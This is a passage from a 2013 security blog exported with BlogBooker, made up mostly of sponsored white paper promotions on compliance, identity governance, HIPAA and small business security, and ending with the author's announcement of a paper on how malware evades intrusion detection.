[1] Compliance mandates are changing, and collecting logs is not enough. To reduce the risk of audit failure, you must be able to produce reports that both help you review anomalies and demonstrate to ever-more attentive auditors that you're doing so. In this white paper:

- Get the security intelligence you need to meet compliance requirements.
- Make better use of time and resources with automated processes.
- Satisfy your internal audiences with graphical reporting that lets them understand your organization's security posture.

[2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_neti24 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_neti24

3.9.8

Identity and Access Governance: Bringing Business and IT Together (2013-09-16 17:32)

The following is external content provided as a free resource for blog readers.

[1] IT professionals and executives who use identity management and access governance systems typically have different objectives and technology backgrounds. Converging the systems makes sense, but it must be robust to meet IT's demands and simple for non-IT professionals to manage. This white paper covers:

- Primary factors driving the growth of the identity and access governance (IAG) marketplace.
- Key elements for effective IAG solutions.
- What you should ask when selecting a vendor.

[2]Request Free!


1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_neti25 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_neti25


3.9.9

Security and HIPAA Compliance: Meeting the Challenge of Securing Protected Health Information (2013-09-16 18:47)

The following is external content provided as a free resource for blog readers.

[1] As the need to ensure the security of sensitive health information grows, security and compliance teams must look to more integrated approaches to both reduce risk and enable streamlined and efficient user workflows. This white paper provides insight into:

- The most important elements of securing sensitive health information
- Meeting HIPAA compliance requirements in a scalable and cost-effective way
- The HITECH Act, which addresses the privacy and security concerns associated with the electronic transmission of health information

By focusing efforts in the key areas of controlling access, monitoring healthcare personnel with broad privileges (privileged users) and managing privilege delegation, organizations can reduce the net risk to themselves and sensitive health information, which in turn eases compliance with standards such as HIPAA and the HITECH Act. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_neti21 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_neti21

3.9.10

Top 10 Security Best Practices for Small Business (2013-09-19 14:32)

The following is external content provided as a free resource for blog readers.

[1] Cybercrime is increasing at epidemic proportions, and small to medium businesses have turned into key targets for cybercriminals. The Wall Street Journal recently stated that small businesses rarely recover from a cyberattack, but there are some very simple steps you can take to protect your business. Download this informative slideshow and improve your security today. [2]Request Free!
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&pc=w_chec08 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=rss&_t=rss&qf=w_chec08

3.9.11

Tricks of the Trade - New Whitepaper Available (Malware evading Intrusion Detection) (2013-09-21 13:58)

[1] I'm happy to announce that I've completed my whitepaper on how malware attempts to evade detection by intrusion detection systems. In this paper I take a look at how malware attempts to evade detection by both network-based and host-based intrusion detection systems through some very clever techniques. All of the malware featured was captured by my own personal honeypots. Please view or download the paper over at Scribd: [2]Tricks of the Trade - How Malware Authors Cover Their Tracks
1. http://3.bp.blogspot.com/-cvtCnFHEdTs/Uj3dhOF1wzI/AAAAAAAAAlM/CNfxD98JpaM/s1600/tricks.jpg 2. http://www.scribd.com/doc/169870648/Tricks-of-the-Trade-%E2%80%93-How-Malware-Authors-Cover-Their-Tracks

BlogBook v0.4, LaTeX 2e & GNU/Linux. http://www.blogbooker.com

Edited: September 22, 2013